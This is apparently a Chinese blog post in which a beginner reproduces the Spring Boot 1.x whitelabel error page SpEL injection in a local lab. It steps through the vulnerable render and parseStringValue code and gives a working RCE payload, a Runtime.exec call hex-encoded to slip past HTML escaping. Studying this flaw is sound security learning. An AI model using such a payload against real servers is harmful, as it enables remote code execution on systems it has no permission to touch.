springboot-spel-rce复现

已于 2022-07-04 23:57:52 修改
阅读量1k 收藏
点赞数
分类专栏: java漏洞复现的记录 文章标签: java
于 2022-07-04 23:53:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/125602287
版权

学习java的不知道多少天,对sprintboot-spel-rce进行复现,记录自己复现的过程。我是一个java初学者,肯定有很多不懂的,写错了的地方欢迎大家来指正。

漏洞利用条件:

  1. SpringBoot版本1.1.0-1.1.12、1.2.0-1.2.7、1.3.0
  2. 知道一个触发SpringBoot默认页面的接口和参数

一、搭建环境

下载地址:https://github.com/LandGrey/SpringBootVulExploit

首先第一个问题,java的jdk版本问题,我环境有java15和java1.8,我一开始使用java15去运行项目,发现报错。 
Java HotSpot(TM) 64-Bit Server VM warning: Options -Xverify:none and -noverify were deprecated in JDK 13 and will likely be removed in a future release.

然后自己去换了一个版本就ok了。 

File->project Settings -> Project -> ProjectSDK

然后在运行就可以了。其它问题到是没遇到过,因为之前我把我的java环境弄好了。这里就没有那么多错误了。

可以看到已经启动了

二、复现漏洞

我们先来看看他能干些什么。

访问http://localhost:9091/article?id=${7*7} 的时候看到存在49。

再来看看弹出计算机的操作

地址是http://localhost:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x63,0x61,0x6c,0x63}))}。

三、分析原理

这边先下载源码,好调试分析。

 

先说说漏洞点,出现在org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration#render方法上。

 

 

 

       这边我先乱分析一通。先看看render方法。先有一个response.getContentType(),判断是不是空,如果是空的话就是response.setContentType(getContentType()),我不知道啥意思,看单词的意思大概是响应报文的ContentType为空的就设置一个。接着看下面,创建一个HashMap,将model传入,这里的model我也不知道是啥。接着调用这个HashMap的put方法,就是往HashMap里面传值,path=request.getContextPath(),大致是将url路径放入这个HashMap?

       this.context看了一下,是StandardEvaluationContext类,然后setRootObject这个函数,判断传入的HashMap是不是空,如果如果为空就执行TypedValue.NULL,如果不为空就创建一个TypedValue的类,将HashMap传入进去。

public void render(Map<String, ?> model, HttpServletRequest request,
				HttpServletResponse response) throws Exception {
			if (response.getContentType() == null) {
				response.setContentType(getContentType());
			}
			Map<String, Object> map = new HashMap<String, Object>(model);
			map.put("path", request.getContextPath());
			this.context.setRootObject(map);
			String result = this.helper.replacePlaceholders(this.template, this.resolver);
			response.getWriter().append(result);
		}

 

迷迷糊糊的,接着往后看吧,看看helper是啥,发现他是一个PropertyPlaceholderHelper。然后调用了replacePlaceholders方法,看看里面是什么。判断value是否为空,然后调用parseString方法,这个方法里面的东西有点多。先不看了。哈哈。最终得到一个结果,然后将结果传入响应报文的getWriter方法。乱分析了一通。

 public String replacePlaceholders(String value, PropertyPlaceholderHelper.PlaceholderResolver placeholderResolver) {
        Assert.notNull(value, "'value' must not be null");
        return this.parseStringValue(value, placeholderResolver, new HashSet());
    }

带着疑问,我们来看别人写的文章

1、第一个传入的model是啥。

               model参数包含着一些请求的路径、参数值、时间等信息,类似于php的REQUEST变量。

2、request.getContextPath()是什么

                <%=request.getContextPath()%>是为了解决相对路径的问题,可返回站点的根路径

3、replacePlaceholders是什么

                解析模板,传入的template参数为报错页面模板,resolver里面就存在着和map变量一样的值(就是一些路径参数、时间等信息),这一步其实就是根据resolver把页面模板里面的模板变量进行替换

4、parseStringValue是什么

                在xml中的EL表达式解析,资源加载,@Value注解内容解析,都用到了这样一个工具类方法,这是漏洞的关键,我还想着不想看,看来是非看不可咯。

 

那就继续分析里面的代码吧,得先看看里面是啥吧。

创建一个StringBuilder类,传入的是第一个参数,也就是template。生成一个StringBuilder类。

protected String parseStringValue(
			String strVal, PlaceholderResolver placeholderResolver, Set<String> visitedPlaceholders) {

		StringBuilder result = new StringBuilder(strVal);

		int startIndex = strVal.indexOf(this.placeholderPrefix);
		while (startIndex != -1) {
			int endIndex = findPlaceholderEndIndex(result, startIndex);
			if (endIndex != -1) {
				String placeholder = result.substring(startIndex + this.placeholderPrefix.length(), endIndex);
				String originalPlaceholder = placeholder;
				if (!visitedPlaceholders.add(originalPlaceholder)) {
					throw new IllegalArgumentException(
							"Circular placeholder reference '" + originalPlaceholder + "' in property definitions");
				}
				// Recursive invocation, parsing placeholders contained in the placeholder key.
				placeholder = parseStringValue(placeholder, placeholderResolver, visitedPlaceholders);
				// Now obtain the value for the fully resolved key...
				String propVal = placeholderResolver.resolvePlaceholder(placeholder);
				if (propVal == null && this.valueSeparator != null) {
					int separatorIndex = placeholder.indexOf(this.valueSeparator);
					if (separatorIndex != -1) {
						String actualPlaceholder = placeholder.substring(0, separatorIndex);
						String defaultValue = placeholder.substring(separatorIndex + this.valueSeparator.length());
						propVal = placeholderResolver.resolvePlaceholder(actualPlaceholder);
						if (propVal == null) {
							propVal = defaultValue;
						}
					}
				}
				if (propVal != null) {
					// Recursive invocation, parsing placeholders contained in the
					// previously resolved placeholder value.
					propVal = parseStringValue(propVal, placeholderResolver, visitedPlaceholders);
					result.replace(startIndex, endIndex + this.placeholderSuffix.length(), propVal);
					if (logger.isTraceEnabled()) {
						logger.trace("Resolved placeholder '" + placeholder + "'");
					}
					startIndex = result.indexOf(this.placeholderPrefix, startIndex + propVal.length());
				}
				else if (this.ignoreUnresolvablePlaceholders) {
					// Proceed with unprocessed value.
					startIndex = result.indexOf(this.placeholderPrefix, endIndex + this.placeholderSuffix.length());
				}
				else {
					throw new IllegalArgumentException("Could not resolve placeholder '" +
							placeholder + "'" + " in string value \"" + strVal + "\"");
				}
				visitedPlaceholders.remove(originalPlaceholder);
			}
			else {
				startIndex = -1;
			}
		}

		return result.toString();
	}

 先查找到第一个${ 最开始的位置和找到对应的 } 的位置,然后在模板字符串中根据开始位置和结束位置进行截取,获得第一个模板变量的名称,在这里就是timestamp

 后面我们看到将得到的值又放入parseStringValue函数,防止还存在${}。最终再调用resolvePlaceholder方法来获取timestamp的值。 

知道了这个地方之后呢,因为我们传入的message是${7*7},他会把截取${}中间的,然后将中间的值放入resolvePlaceholder函数中,导致SpEL表达式注入。

可以看到propVal已经变成49了。其中存在HtmlUtils.htmlEscape,是会进行html实体编译的,使用十六进制进行绕过。

 到这就结束了。因为代码执行点就在这。这边给上一个十六进制绕过弹计算机的payload

/article?id=${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x63,0x61,0x6c,0x63}))}

四、总结

1、很多代码都不懂,没事慢慢来,见多了就懂了。知道了Spel代码注入的关键函数为resolvePlaceholder,然后实体编码的函数为HtmlUtils.htmlEscape。

2、之前是debug调试代码没问题,这次知道了怎么调试springbootMvc。

3、Spel表达式学习连接SpringBoot 1.x SpEL表达式注入漏洞 - zpchcbd - 博客园

angelkat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
15-IoC配置-SpEL
04-25
自动按照类型注入,只要容器中有唯一个bean读写的类型和要注入的变量类型匹配,就可注入成功可以出现在变量上,也可出现在方法上如果没有类型匹配,会报错如果匹配多个,将变量名称作为id根据id查找
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
weixin_42786460的博客
09-17 637
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 2936
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
Springboot远程代码执行(spring cloud SnakeYAML RCE
qq_50854662的博客
06-27 747
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
Spring Boot RCE到内存马探索
小王的储物间
02-13 1206
SpringBootVulExploit是Spring Boot漏洞Checklist,但在真正的环境中进行漏洞利用还是有一段距离的,因此衍生出了SpringBootExploit工具。本文是对该Checklist到内存马探索之路的记录。可能是大多数人没有需求,或者是安全研究员没有打红队的原因。导致利用方式普遍都是以弹计算器为最终结果,不能进一步深入利用,导致很多漏洞不了了之。目前网上普遍分析文章,复现文章都是以弹计算器结束,但这其实与实战化的需求还存在着很远的一段路程。
实战案例:记一次利用SpringBoot相关RCE-bug拿下某数字化平台系统
最新发布
hackzkaq的博客
01-17 149
在一次众测项目中,对某大型企业的某套数字化平台系统进行测试,前端功能简单,就一个登录页面,也没有测试账号,由于给的测试时间不多,倒腾了半天没有发现有价值的漏洞,在快要结束的时候,试了几个报错,发现是Spring Boot框架的,仿佛间看到曙光,后续也顺利拿下RCE。通过本文的分享,希望能给大家获取到一些思路和帮助~~访问http://xx.xx.xx.xx/,打开就是一个某数字化平台登录页面,尝试了登录框可能存在的各类漏洞问题,如弱口令,用户名枚举,万能密码登录,登录验证绕过,任意密码重置等等,无果。
Spring-Core RCE反序列化漏洞原理与复现
FisrtBqy的博客
05-15 1932
Spring-Beans RCE反序列化漏洞原理与复现
spring-boot-annotation-spel.zip
10-14
SpringBoot 自定义注解,属性支持SPEL表达式。介绍了SPEL表达式的解析
SpringBoot SpEL语法扫盲与查询手册的实现
08-19
主要介绍了SpringBoot SpEL语法扫盲与查询手册的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
2d---spel-abbsamoze:GitHub Classroom创建的2d--spel-abbsamoze
03-30
2D--Spel-Absamoze 2D--Spel-Absamoze
SSH笔记-SpEL
06-10
SSH笔记-Spring表达式语言:SpEL,关于SpEl的字面量、引用 Bean、属性和方法、支持的运算符号
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 8145
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 1991
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
SpringBoot SpEL RCE漏洞分析
12-07 1820
SpringBoot SpEL RCE 前言最近一段时间学习Spring系列的漏洞,跟着Github上的资源学习
(2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现
qq1140037586的博客
12-20 2210
spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞。
SpringBoot eureka xstream deserialization RCE
LiBai'S BLOG
03-01 3647
利用条件 可以 POST 请求目标网站的 /env 接口设置属性 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖) 目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中) 目标可以请求攻击者的 HTTP 服务器(请求可出外网) 利用方法 步骤一:架设响应恶意 XStream payload 的网站 提供一
Spring(SpringBoot) SpEl介绍
杨海吉
07-19 3285
EL表达式大家也许都听说过,但是用Spring作为脚手架的我们,经常在用SpEl表达式,但你真的了解SpEl吗?本文将带你分析学习SpEl表达式
SpringBoot远程代码执行(whitelabel error page SpEL RCE
qq_50854662的博客
06-27 280
Spring-boot远程代码执行系列(whitelabel error page SpEL RCE
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 3751
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
springboot-3-整合ehcache缓存
05-17
在Spring Boot中整合Ehcache缓存,需要进行以下几个步骤: 1. 添加Ehcache依赖 在pom.xml文件中添加Ehcache依赖: ``` <dependency> <groupId>net.sf.ehcache</groupId> <artifactId>ehcache</artifactId> <version>${ehcache.version}</version> </dependency> ``` 2. 配置Ehcache缓存 在application.yml(或application.properties)文件中配置Ehcache缓存: ``` spring: cache: type: ehcache ehcache: config: classpath:ehcache.xml ``` 其中,`spring.cache.type`属性指定使用的缓存类型为Ehcache,`ehcache.config`属性指定Ehcache配置文件的路径(在classpath下)。 3. 编写Ehcache配置文件 在classpath下创建`ehcache.xml`文件,配置Ehcache缓存的相关信息: ``` <ehcache> <diskStore path="java.io.tmpdir"/> <defaultCache maxEntriesLocalHeap="10000" eternal="false" timeToIdleSeconds="120" timeToLiveSeconds="120" diskSpoolBufferSizeMB="30" maxEntriesLocalDisk="10000000" diskExpiryThreadIntervalSeconds="120" memoryStoreEvictionPolicy="LRU" transactionalMode="off"> </defaultCache> <cache name="userCache" maxEntriesLocalHeap="1000" maxEntriesLocalDisk="10000" eternal="false" diskSpoolBufferSizeMB="20" timeToIdleSeconds="300" timeToLiveSeconds="600" memoryStoreEvictionPolicy="LFU" transactionalMode="off"> </cache> </ehcache> ``` 其中,`defaultCache`为默认缓存配置,`cache`为自定义缓存配置。 4. 在代码中使用缓存 在需要使用缓存的方法上添加`@Cacheable`注解,指定缓存名称和缓存key: ``` @Service public class UserServiceImpl implements UserService { @Autowired private UserDao userDao; @Override @Cacheable(value = "userCache", key = "#id") public User getUserById(Integer id) { return userDao.getUserById(id); } // ... } ``` 其中,`value`属性指定缓存名称,`key`属性为缓存key表达式,可以使用Spring表达式语言(SpEL)进行动态表达。 以上就是在Spring Boot中整合Ehcache缓存的步骤,通过使用Ehcache缓存可以有效地提高应用程序的性能和响应速度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值